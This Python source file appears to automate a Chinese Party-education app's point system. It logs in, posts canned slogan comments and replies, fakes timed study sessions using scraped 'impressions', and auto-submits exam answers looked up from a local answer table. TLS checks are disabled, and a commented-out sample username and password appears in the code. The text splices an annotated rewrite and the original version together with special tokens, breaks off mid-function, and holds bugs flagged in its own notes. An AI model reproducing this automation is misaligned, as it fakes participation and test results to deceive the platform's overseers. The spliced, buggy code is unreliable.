        urllib3.disable_warnings()
        self.currentTime = datetime.datetime.now().strftime('%H:%M:%S')
        self.username = username
        self.password = password
        # NOTE(review): '.format(username)' has no '{}' placeholder, so
        # username is ignored and every user shares these directories.
        self.thumbedFilePath = './lib/'.format(username)
        self.logFilePath = './log/'.format(username)
        self.errFilePath = './err/'.format(username)
        self.thumbedFileList = []
        self.debug = True
        self.session = requests.session()
        self.appid = appid
        self.headers = {'User-Agent':
            'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)'
            , 'header_version': '80', 'system': 'android', 'Connection':
            'Keep-Alive', 'Host': 'mapi.dangjianwang.com'}
        self.token = self.getToken()
        time.sleep(0.1)
        # (title, id) tuples of pages eligible for comments.
        self.thumbPageList = self.getPages(urls=[
            'https://mapi.dangjianwang.com/v3_1/Learn/List',
            'https://mapi.dangjianwang.com/v3_1/Activities/List',
            'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'])
        self.thumbPages = [i[1] for i in self.thumbPageList]
        time.sleep(0.1)
        self.helpPageList = self.getPages(urls=[
            'https://mapi.dangjianwang.com/v3_1/Help/List'])
        self.helpPages = [i[1] for i in self.helpPageList]
        self.helpResults = {}
        time.sleep(0.1)
        self.studyPageList = self.getPagesII(urls=[
            'https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
        self.studyPages = [i[1] for i in self.studyPageList]
        time.sleep(0.1)
        self.studyRsults = {}
        self.thumbedPages = []
        self.thumbResults = {}
        self.helpedPages = []
        self.multiThumbed = []
        self.viewsResults = []
        self.examC19Info = []
        self.examlist = []
        self.qaList = []
    def getCurrentTime(self):
        """Return the current wall-clock time as 'HH:MM:SS'."""
        return datetime.datetime.now().strftime('%H:%M:%S')
    def writeErr2File(self, err):
        """Append *err* with a timestamp to this user's error file.

        NOTE(review): writes under self.logFilePath, not
        self.errFilePath — possibly unintended.
        """
        path = self.logFilePath
        fullPath = '{}{}err.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write('{}:{}\n'.format(self.currentTime, err))
        print('err已经写入{}'.format(fullPath))
    def writeLog2File(self, log):
        """Append *log* with a timestamp to this user's log file."""
        path = self.logFilePath
        fullPath = '{}{}logs.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write('{}:{}\n'.format(self.currentTime, log))
        print('log已经写入{}'.format(fullPath))
    def writeThumb2File(self, id):
        """Append a commented page *id* to the per-user record file."""
        path = self.thumbedFilePath
        fullPath = '{}{}thumbs.txt'.format(path, self.username)
        if not os.path.exists(path):
            os.mkdir(path)
        with open(fullPath, 'a') as f:
            f.write(',{}'.format(id))
        print('点赞记录已经写入{}'.format(fullPath))
    def getThumbFromFile(self):
        """Return the list of already-recorded ids from disk.

        Also rewrites the file deduplicated and sorted.
        NOTE(review): when the file does not exist this returns the
        *path string* instead of a list — inconsistent return type.
        """
        path = self.thumbedFilePath
        inFileList = []
        fullPath = '{}{}thumbs.txt'.format(path, self.username)
        if not os.path.exists(fullPath):
            return fullPath
        with open(fullPath, 'r') as f:
            inFileList.extend(list(set(f.readlines()[0].split(','))))
        with open(fullPath, 'w') as f1:
            f1.write(','.join(sorted(inFileList)))
        return inFileList
    def getExcuteTimes(self):
        """Return a dict of how many times each automated action
        (thumb/help/view/exam/study) still needs to run today, derived
        from the 'gained/quota' strings in getCredItinfo()."""
        excuteTimes = {}
        credInfo = self.getCredItinfo()
        print(credInfo)
        currentScore = credInfo[0]
        thumbScore = credInfo[1]['信息评论'].split('/')[0]
        thumbExcuteTimes = 10 - int(thumbScore)
        excuteTimes.update({'thumb': thumbExcuteTimes})
        helpScore = credInfo[1]['互助广场回答'].split('/')[0]
        helpExctuteTimes = 2 - int(helpScore)
        excuteTimes.update({'help': helpExctuteTimes})
        viewScore = credInfo[1]['党员视角发布'].split('/')[0]
        viewExcuteTimes = int((4 - int(viewScore)) / 2)
        excuteTimes.update({'view': viewExcuteTimes})
        examScore = credInfo[1]['在线知识竞答'].split('/')[0]
        examExcuteTimes = int((4 - int(examScore)) / 2)
        excuteTimes.update({'exam': examExcuteTimes})
        # 'study' runs once if either the reading or the write-up quota
        # is unmet (examExcuteTimes is reused here as a scratch var).
        flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]
            ['在线阅读学习资料'].split('/')[0])
        flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]
            ['学习资料写体会'].split('/')[0])
        examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
        excuteTimes.update({'study': examExcuteTimes})
        return excuteTimes
    def getToken(self):
        """Log in and return the session token, or None on failure.

        Every other request includes this token.
        """
        data = {'appid': self.appid, 'username': self.username, 'password':
            self.password}
        longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
        r = self.session.post(url=longinurl, data=data, verify=False)
        rjson = r.json()
        if rjson['code'] == '200':
            return rjson['token']
        else:
            print('token 获得失败')
            return None
    def getRJson(self, url):
        """POST the standard token/appid form to *url*; return JSON."""
        data = {'token': self.token, 'appid': self.appid}
        return self.session.post(url=url, data=data, verify=False).json()
    def getUserInfo(self):
        """Fetch the raw user-info payload (currently unused)."""
        infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
        return self.getRJson(url=infoUrl)
    def getCredItinfoToday(self):
        """Return today's score/level summary for the current user."""
        creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
        info = self.getRJson(url=creditInfourl)
        fullScore = info['data']['full']
        gainScore = info['data']['gain']
        currentLevel = info['data']['level']
        username = info['data']['name']
        ret = {'fullScore': fullScore, 'gainScore': gainScore,
            'currentLevel': currentLevel, 'username': username}
        return ret
    def getCredItinfo(self):
        """Return (haved_credit, credit_detail) for today.

        credit_detail maps item title -> 'gained/quota' score string,
        e.g. ('35', {'信息评论': '10/10', ...}); used to decide whether
        more automated actions are needed today.
        """
        creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
        haved_credit = 0
        credit_detail = {}
        info = self.getRJson(url=creditInfourl)
        for k, v in info.items():
            if k == 'data':
                for k2, v2 in v.items():
                    if k2 == 'haved_credit':
                        haved_credit = v2
                    if k2 == 'credit_detail':
                        for i in v2:
                            credit_detail.update({i['title']: i['score']})
        return haved_credit, credit_detail
    def getPages(self, urls):
        """Return (title, id) tuples from each listing endpoint."""
        pages = []
        for url in urls:
            data = self.getRJson(url=url)
            for k, v in data.items():
                if k == 'data':
                    for i in v:
                        pages.append((i['title'], i['id']))
        return pages
    def getPagesII(self, urls):
        """Return (name, id) tuples from the study-material listing.

        Uses a fixed type_id/page_index form (shadows getRJson with a
        local helper) instead of the standard token/appid-only form.
        """
        def getRJson(url):
            data = {'token': self.token, 'appid': self.appid, 'type_id':
                '791', 'page_index': '1'}
            return self.session.post(url=url, data=data, verify=False).json()
        pages = []
        for url in urls:
            data = getRJson(url=url)
            for k, v in data.items():
                if k == 'data':
                    for i in v:
                        pages.append((i['name'], i['id']))
        return pages
    def doThumb(self, id):
        """Post a canned comment on page *id* and record the result.

        Response handling: '1003' -> refresh token; '200' + 成功 ->
        log, persist to file, return (detail, thumbInfo); '500' rate
        limit -> sleep 20s; anything else -> record and move on.
        Returns None on all non-success paths.
        """
        contents = ['关注', '关注!', '关注!!']
        data = {'id': id, 'comment': random.choice(contents), 'token': self
            .token, 'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        print(rjson)
        if rjson['code'] == '1003':
            self.token = self.getToken()
        elif rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.thumbedPages.append(id)
                for i in list(set(self.thumbPageList)):
                    if id == i[1]:
                        temp = {'title': i[0]}
                        self.thumbResults.update(temp)
                        log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data[
                            'comment'])
                        detail = '{} 主题:{}\n回复:{}\n'.format(self.
                            getCurrentTime(), i[0], data['comment'])
                        write2File(self, './results/', 'result.txt', log)
                        thumbInfo = {'title': i[0], 'reply': data['comment']}
                        self.thumbPages.remove(id)
                        self.writeThumb2File(id=id)
                        return detail, thumbInfo
        elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
            print('因评论过快,等待一段时间')
            time.sleep(20)
        else:
            print('rjson', rjson)
            # NOTE(review): id was never appended on this path, so
            # remove() may raise ValueError — confirm intent.
            self.thumbedPages.remove(id)
            self.writeThumb2File(id=id)
        log = '点赞:{}'.format(rjson)
        self.writeLog2File(log)
        print(log)
        time.sleep(10)
    def doHelp(self, id, callback=None):
        """Post a canned reply to help question *id*.

        Returns (detail, log, helpInfo); helpInfo stays None unless the
        reply succeeded. NOTE(review): on success this reads
        rjson['comment'] and id[0] — verify the key exists; 'i[0]' was
        probably intended instead of 'id[0]'. The inner 'else' is a
        for-else (runs when the loop completes without break).
        """
        detail = ''
        helpInfo = None
        log = ''
        content = ['把党的政治建设摆在首位!', '不忘初心,牢记使命!', '发展史第一要务,人才是第一资源,创新是第一动力。',
            '要把党的领导贯彻到依法治国全过程和各方面', '毫不动摇坚持中国共产党领导']
        data = {'id': id, 'content': random.choice(content), 'token': self.
            token, 'appid': self.appid}
        print(data)
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        if rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.helpedPages.append(id)
                self.helpPages.remove(id)
                for i in self.helpPageList:
                    if id == i[1]:
                        curTime = self.getCurrentTime()
                        self.helpResults.update({'title': id[0]})
                        log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson[
                            'comment'])
                        write2File(self, './results/', 'result.txt', log)
                        detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[
                            0], rjson['comment'].strip())
                        helpInfo = {'title': i[0], 'reply': rjson['comment']}
                else:
                    pass
        else:
            pass
        log = '帮助:{}'.format(rjson)
        self.writeLog2File(log)
        print(log)
        return detail, log, helpInfo
    def doView(self):
        """Publish a canned "party member viewpoint" post.

        Returns (detail, publicContent).
        NOTE(review): rjson['data']['content'] is read even when the
        code is not '200' — may raise KeyError on failure responses.
        """
        content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']
        data = {'content': random.choice(content), 'token': self.token,
            'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        if rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.viewsResults.append(1)
            else:
                pass
        log = '党员视角:{}'.format(rjson)
        detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson[
            'data']['content'])
        publicContent = rjson['data']['content']
        return detail, publicContent
    def doStudy(self, mid):
        """Run one timed study session for material *mid*.

        post1/post2/post3 mirror the app's bookkeeping requests; get1
        scrapes a paragraph from the material page to use as the
        "study impression"; after waiting ~5 minutes, recordFeeling
        submits the text and readTime reports the elapsed time — a
        successful readTime means the session counted.
        """
        interval = 60 * 5 + 5
        def post1():
            # Collection-status check for this material.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post1:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post2():
            # Token validity check.
            data = {'token': self.token, 'appid': self.appid}
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post2:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post3():
            # Fetch the impression count for this material.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习post3:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def get1():
            # Scrape candidate paragraphs from the material page.
            url = (
                'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'
                .format(self.token, mid))
            rjson = self.session.get(url=url)
            text = rjson.content
            soup = BeautifulSoup(text, 'html.parser')
            retContents = []
            for div in soup.find_all('p'):
                p = div.text.strip()
                # NOTE(review): '100 > len(p) < 200' means len(p) < 100;
                # the 200 bound is redundant — confirm intended filter.
                retContents.append(p if 100 > len(p) < 200 else p[0:200])
            return random.choice(retContents)
        def recordFeeling(content=None):
            # Submit the study impression; on code '1120' (apparently a
            # duplicate-content rejection) retry with an extra random
            # sentence appended. Returns {'content': ...} or None.
            if not content:
                content = (
                    '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'
                    )
            data = {'mid': mid, 'token': self.token, 'appid': self.appid,
                'content': content}
            commitUrl = (
                'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习recordFeeling:{}'.format(rjson)
            self.writeLog2File(log)
            print('in recordFeeling')
            print(log)
            if rjson['code'] == '200':
                return {'content': content}
            elif rjson['code'] == '1120':
                addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',
                    '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',
                    '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']
                return recordFeeling(content='{}\n{}'.format(content,
                    random.choice(addtion)))
            else:
                return None
        def readTime():
            # Report the elapsed reading time to close the session.
            data = {'mid': mid, 'token': self.token, 'appid': self.appid,
                'time': interval}
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'
            rjson = self.session.post(url=commitUrl, data=data, verify=False
                ).json()
            log = '学习readTime:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        post1()
        time.sleep(1)
        post2()
        time.sleep(1)
        post3()
        time.sleep(1)
        content = get1()
        time.sleep(1)
        count = 0
        print('开始学习请稍后')
        # Wait out the required reading time, one second per tick.
        for i in range(interval):
            count += 1
            if count % 30 == 0:
                print('已用时{}秒'.format(count))
            time.sleep(1)
        print('填写的学习体会', content)
        # NOTE(review): recordFeeling may return None, which would make
        # this update() raise TypeError — confirm.
        self.studyRsults.update(recordFeeling(content=content))
        time.sleep(1)
        readTime()
        time.sleep(1)
        pass
    def doExam(self):
        """Take one random exam from hard-coded bank '6', answer via
        the local Qa table (substring match), and hand the paper in.

        The first examlist response is discarded (rjson reassigned) —
        presumably a warm-up request; TODO confirm.
        """
        ids = []
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'
        rjson = self.session.post(url=examlistUrl, data=data, verify=False
            ).json()
        time.sleep(0.3)
        print('*' * 99)
        data = {'page': '1', 'page_size': '20', 'token': self.token,
            'appid': self.appid}
        banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'
        rjson = self.session.post(url=banklistUrl, data=data, verify=False
            ).json()
        for i in rjson['data']:
            tem = i['bank_name'], i['id']
            self.examlist.append(tem)
            if i['bank_name'] == '十九大报告100题(单选)':
                temp = {'title': i['bank_name'], 'detail': i['detail'],
                    'id': i['id']}
                self.examC19Info.append(temp)
        time.sleep(0.3)
        print('*' * 99)
        data = {'bank': '6', 'token': self.token, 'appid': self.appid}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        aa = rjson['data']
        paper = aa['id']
        for i in aa['questions']:
            temp = {'id': i['id'], 'content': i['content']}
            ids.append(temp)
        print('*' * 99)
        time.sleep(0.5)
        answers = []
        for i in ids:
            correctAnswer = Qa.objects.filter(question__contains=i['content'])[
                0]
            answerText = correctAnswer.answerText
            answer = correctAnswer.answer
            temp = {'index': i['id'], 'answer': answer}
            qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}
            self.qaList.append(qa)
            print(qa, i['content'])
            answers.append(temp)
            time.sleep(1)
        hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,
            'answers': json.dumps(answers)}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'
        rjson = self.session.post(url=commitUrl, data=hdata, verify=False
            ).json()
        print(rjson)
        print(self.examlist)
        print(self.examC19Info)
        print(self.qaList)
    def getAnswerInfo(self):
        """Fetch answer results / accuracy (debug helper; just prints).

        NOTE(review): sends the literal string 'page_index' as the
        page_index value to the randexam endpoint — looks wrong.
        """
        data = {'token': self.token, 'appid': self.appid, 'page_size': '20',
            'page_index': 'page_index'}
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'
        rjson = self.session.post(url=commitUrl, data=data, verify=False).json(
            )
        print(rjson)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import json
import os, django
# Django must be configured before importing the project modules below.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dangjianyun.settings")# project settings module
django.setup()
from dangjiansite.djfuncs import *
import os
# NOTE(review): 'os' is imported twice (also above).
import datetime
import requests
import time
import urllib3
import base64
import csv
import random
from bs4 import BeautifulSoup
from dangjiansite.models import *
class Runner():
# def __init__(self, appid='TJZHDJ01', username='024549', password='Aa1234'):
def __init__(self, appid='TJZHDJ01', username='', password=''):
urllib3.disable_warnings()#屏蔽ssl告警
self.currentTime = datetime.datetime.now().strftime("%H:%M:%S")
self.username = username
self.password = password
self.thumbedFilePath = './lib/'.format(username)
self.logFilePath = './log/'.format(username)
self.errFilePath = './err/'.format(username)
# self.thumbedFileList = self.getThumbFromFile()
self.thumbedFileList = []
self.debug = True
self.session = requests.session()
self.appid = appid#应该是本设备安装app的id 等换个设备试一下就知道了
self.headers ={
'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)',
'header_version': '80',
'system': 'android',
'Connection': 'Keep-Alive',
'Host': 'mapi.dangjianwang.com',
}
self.token = self.getToken()
time.sleep(0.1)
self.thumbPageList = self.getPages(urls=[
'https://mapi.dangjianwang.com/v3_1/Learn/List',
'https://mapi.dangjianwang.com/v3_1/Activities/List',
'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'
])
self.thumbPages = [i[1] for i in self.thumbPageList]
time.sleep(0.1)
self.helpPageList = self.getPages(urls=['https://mapi.dangjianwang.com/v3_1/Help/List', ])
self.helpPages = [i[1] for i in self.helpPageList]
self.helpResults = {}
time.sleep(0.1)
self.studyPageList = self.getPagesII(urls=['https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])
self.studyPages = [i[1] for i in self.studyPageList]
time.sleep(0.1)
self.studyRsults = {}
self.thumbedPages = []
self.thumbResults = {}
self.helpedPages = []
self.multiThumbed = []#考虑最后要写入文件之中
self.viewsResults = []
self.examC19Info = []
self.examlist = []
self.qaList = []
def getCurrentTime(self):
return datetime.datetime.now().strftime("%H:%M:%S")
def writeErr2File(self, err):
path = self.logFilePath
fullPath = '{}{}err.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, err))
print('err已经写入{}'.format(fullPath))
def writeLog2File(self, log):
path = self.logFilePath
fullPath = '{}{}logs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write('{}:{}\n'.format(self.currentTime, log))
print('log已经写入{}'.format(fullPath))
def writeThumb2File(self, id):
path = self.thumbedFilePath
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(path):
os.mkdir(path)
with open(fullPath, 'a') as f:
f.write(',{}'.format(id))
print('点赞记录已经写入{}'.format(fullPath))
def getThumbFromFile(self):
'''
:return: 文件中id组成的列表
'''
path = self.thumbedFilePath
inFileList = []
fullPath = '{}{}thumbs.txt'.format(path, self.username)
if not os.path.exists(fullPath):
return fullPath
with open(fullPath, 'r') as f:
inFileList.extend(list(set(f.readlines()[0].split(','))))
# print('getThumbFormFile', inFileList)
with open(fullPath, 'w') as f1:
f1.write(','.join(sorted(inFileList)))
return inFileList
def getExcuteTimes(self):
'''
返回点赞等自动执行的次数的字典
:return:
'''
excuteTimes = {}
credInfo = self.getCredItinfo()
print(credInfo)
currentScore = credInfo[0]
# 点赞次数
thumbScore = credInfo[1]['信息评论'].split('/')[0]
thumbExcuteTimes = 10 - int(thumbScore)
excuteTimes.update({'thumb': thumbExcuteTimes})
# 帮助次数
helpScore = credInfo[1]['互助广场回答'].split('/')[0]
helpExctuteTimes = 2 - int(helpScore)
excuteTimes.update({'help': helpExctuteTimes})
# 党员视角发布次数
viewScore = credInfo[1]['党员视角发布'].split('/')[0]
viewExcuteTimes = int((4 - int(viewScore)) / 2)
excuteTimes.update({'view': viewExcuteTimes})
# 在线知识竞答次数
examScore = credInfo[1]['在线知识竞答'].split('/')[0]
examExcuteTimes = int((4 - int(examScore)) / 2)
excuteTimes.update({'exam': examExcuteTimes})
# 学习次数
flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]['在线阅读学习资料'].split('/')[0])
flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]['学习资料写体会'].split('/')[0])
examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0
excuteTimes.update({'study': examExcuteTimes})
return excuteTimes
def getToken(self):
'''
获得一个连接的token
每个连接都需要使用到
:return:
'''
data = {
'appid': self.appid,
'username': self.username,
'password': self.password,
}
longinurl = 'https://mapi.dangjianwang.com/v3_1/login'
r = self.session.post(url=longinurl, data=data, verify=False)
rjson = r.json()
# print(type(rjson))
# print(rjson)
if rjson['code'] == '200':
return rjson['token']
else:
print('token 获得失败')
return None
def getRJson(self, url):
data={
'token': self.token,
'appid': self.appid
}
return self.session.post(url=url, data=data, verify=False).json()
def getUserInfo(self):
'''
获得一大串用户的信息,暂时没用
:return:
'''
infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'
return self.getRJson(url=infoUrl)
def getCredItinfoToday(self):
'''
获得人员当前的得分等级参数
:return:
'''
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
info = self.getRJson(url=creditInfourl)
fullScore = info['data']['full']
gainScore = info['data']['gain']
currentLevel = info['data']['level']
username = info['data']['name']
ret = {
'fullScore': fullScore,
'gainScore': gainScore,
'currentLevel': currentLevel,
'username': username,
}
return ret
def getCredItinfo(self):
'''
获得用户的今日积分状态
可用来判断是否需要再继续流程
数据如下
('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])
:return:(haved_credit, credit_detail)
'''
creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'
haved_credit = 0
credit_detail = {}
info = self.getRJson(url=creditInfourl)
for k, v in info.items():
if k == 'data':
for k2, v2 in v.items():
if k2 == 'haved_credit':
haved_credit = v2
if k2 == 'credit_detail':
for i in v2:
credit_detail.update({i['title']: i['score']})
return (haved_credit, credit_detail)
def getPages(self, urls):
pages = []
for url in urls:
data = self.getRJson(url=url)
for k, v in data.items():
if k == 'data':
for i in v:
# pages.append({'pageId': i['id'], 'pageTitle': i['title']})
# pages.append(i['id'])
pages.append((i['title'], i['id']))
return pages
def getPagesII(self, urls):
def getRJson(url):
data = {
'token': self.token,
'appid': self.appid,
'type_id': '791',
'page_index': '1',
}
return self.session.post(url=url, data=data, verify=False).json()
pages = []
for url in urls:
data = getRJson(url=url)
for k, v in data.items():
# print(k, v)
if k == 'data':
for i in v:
# pages.append({'pageId': i['id'], 'pageTitle': i['title']})
# pages.append(i['id'])
pages.append((i['name'], i['id']))
return pages
    def doThumb(self, id):
        '''
        Comment ("thumb") the page identified by *id* and record the result.

        On success the id moves from self.thumbPages to self.thumbedPages and
        is appended to the per-user thumbs file; a throttle response sleeps
        20 seconds; any other response also records the id so it is not
        picked again.
        :param id: page id taken from self.thumbPageList
        :return: (detail, thumbInfo) on success, otherwise None
        '''
        contents = [
            '关注',
            '关注!',
            '关注!!']
        data = {
            'id': id,
            'comment': random.choice(contents),
            'token': self.token,
            'appid': self.appid,
        }
        commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'
        rjson = self.session.post(url=commitUrl,
                                  data=data,
                                  verify=False).json()
        print(rjson)
        if rjson['code'] == '1003':
            # Token expired — refresh it so a later call can retry.
            self.token = self.getToken()
        elif rjson['code'] == '200':
            result = rjson['msg']
            if result == '操作成功':
                self.thumbedPages.append(id)
                # print(self.thumbPageList)
                # print(len(self.thumbPageList), len(list(set(self.thumbPageList))))
                for i in list(set(self.thumbPageList)):
                    if id == i[1]:
                        temp = {'title': i[0]}
                        self.thumbResults.update(temp)
                        log = '信息点赞:\n主题: {}\n提交:{}'.format(i[0], data['comment'])
                        detail = '{} 主题:{}\n回复:{}\n'.format(self.getCurrentTime(), i[0], data['comment'])
                        # write2File comes from dangjiansite.djfuncs (wildcard import).
                        write2File(self, './results/', 'result.txt', log)
                        thumbInfo = {'title': i[0], 'reply': data['comment']}
                        self.thumbPages.remove(id)
                        self.writeThumb2File(id=id)
                        return (detail, thumbInfo)
        elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':
            print('因评论过快,等待一段时间')
            time.sleep(20)
        else:
            print('rjson', rjson)
            # self.multiThumbed.append(id)
            # NOTE(review): on this path id was never appended to
            # self.thumbedPages, so this remove() can raise ValueError —
            # confirm intended behavior.
            self.thumbedPages.remove(id)# drop on failure too, or it would keep being picked
            self.writeThumb2File(id=id)
        log = '点赞:{}'.format(rjson)
        self.writeLog2File(log)
        print(log)
        time.sleep(10)
def doHelp(self, id, callback=None):
'''
互助功能
:param id:
:return:
'''
detail = ''
helpInfo = None
log = ''
content = [
'把党的政治建设摆在首位!',
'不忘初心,牢记使命!',
'发展史第一要务,人才是第一资源,创新是第一动力。',
'要把党的领导贯彻到依法治国全过程和各方面',
'毫不动摇坚持中国共产党领导',]
data = {
'id': id,
'content': random.choice(content),
'token': self.token,
'appid': self.appid,
}
print(data)
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.helpedPages.append(id)
self.helpPages.remove(id)
#记录成功的到result
for i in self.helpPageList:
if id == i[1]:
curTime = self.getCurrentTime()
# print('('*88)
# print(curTime)
self.helpResults.update({'title': id[0]})
log = '互助:\n主题: {}\n提交内容: {}'.format(i[0], rjson['comment'])
write2File(self, './results/', 'result.txt', log)
# #写入数据库
detail = '{} 主题: {}\n提交内容: {}\n'.format(curTime, i[0], rjson['comment'].strip())
helpInfo = {'title': i[0], 'reply': rjson['comment']}
else:
pass
else:
pass
log = '帮助:{}'.format(rjson)
self.writeLog2File(log)
print(log)
return (detail, log, helpInfo)
def doView(self):
'''
党员视角发布功能
:return:
'''
content = [
'全面的小康,覆盖的人口要全面,是惠及全体人民的小康。',
'不忘初心,牢记使命,坚持终身学习!']
data = {
'content': random.choice(content),
'token': self.token,
'appid': self.appid,
}
commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'
rjson = self.session.post(url=commitUrl,
data=data,
verify=False).json()
if rjson['code'] == '200':
result = rjson['msg']
if result == '操作成功':
self.viewsResults.append(1)
# self.viewsResults.append(id)
else:
pass
log = '党员视角:{}'.format(rjson)
detail = '{} 党员视角:\n发布内容:{}\n'.format(self.getCurrentTime(), rjson['data']['content'])
publicContent = rjson['data']['content']
# print(detail)
# self.writeLog2File(log)
# print('党员视角'*12)
# print(id)
# print(log)
# print('党员视角' * 12)
return (detail, publicContent)
    def doStudy(self, mid):
        '''
        Complete one "study" session for material *mid*.

        Sequence: three status POSTs, a GET that scrapes a paragraph from the
        material page to use as the study impression, a ~5 minute wait, then
        the RecordFeeling and ReadTime POSTs; ReadTime succeeding is what
        makes the session count.
        :param mid: material id from self.studyPageList
        :return: None (results accumulate in self.studyRsults)
        '''
        # Server-side minimum reading time is 5 minutes; add a small margin.
        interval = 60 * 5 + 5
        def post1():
            # Check the collection status of the material.
            data = {
                'mid': mid,
                'token': self.token,
                'appid': self.appid,
            }
            commitUrl = 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus'
            rjson = self.session.post(url=commitUrl,
                                      data=data,
                                      verify=False).json()
            # print(rjson)
            log = '学习post1:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post2():
            # Validate the current token.
            data = {
                'token': self.token,
                'appid': self.appid,
            }
            commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'
            rjson = self.session.post(url=commitUrl,
                                      data=data,
                                      verify=False).json()
            # print(rjson)
            log = '学习post2:{}'.format(rjson)
            self.writeLog2File(log)
            print(log)
        def post3():
            # Fetch how many impressions have already been recorded.
            data = {
